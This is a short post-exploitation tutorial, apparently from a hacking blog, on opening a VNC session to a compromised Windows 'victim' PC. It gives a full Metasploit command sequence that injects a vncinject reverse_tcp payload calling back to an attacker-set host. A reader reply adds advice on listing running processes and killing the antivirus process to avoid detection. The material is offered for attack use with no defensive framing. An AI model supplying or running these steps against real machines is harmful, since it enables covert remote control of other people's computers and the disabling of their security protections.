Capture VNC Session of Remote Windows PC by Payloads Injection
This article contains the post-exploitation method. To run following commands successfully first take a session of meterpreter and then follow the commands
In this digital era, more and more people are becoming aware of security and all the companies take the responsibility to increase their security. Hence, technology is being upgraded every single second. Therefore, it is becoming difficult to hack modern technology. But where there is will; there is a way.
We all know that every problem comes with a solution, and so is our following problem:
While taking control over our victim’s PC, often due to security measures some of our commands do not work such as run vnc and so, we might come across such error:
In such a case, there is a special payload, especially for vnc. Whenever you face such problem use following exploit:
use windows/manage/payload_inject msf exploit (payload_inject)>set payload windows/vncinject/reverse_tcp msf exploit (payload_inject)>set lhost 192.168.1.109 msf exploit (payload_inject)>set session 1 msf exploit (payload_inject)>set handler true msf exploit (payload_inject)>exploit
After executing you can see the following result:
If victim is running Anti Virus then it is easily detected by AV.. any solutions..
Do a ‘ps’ command once you’re in the Metepreter shell and it will list all running processes. Look for the antivirus process(different antivirus vendors will have different process names) and kill it with the ‘kill ‘ where PID is the Process ID of that antivirus. Then re-run the VNC dll injection again.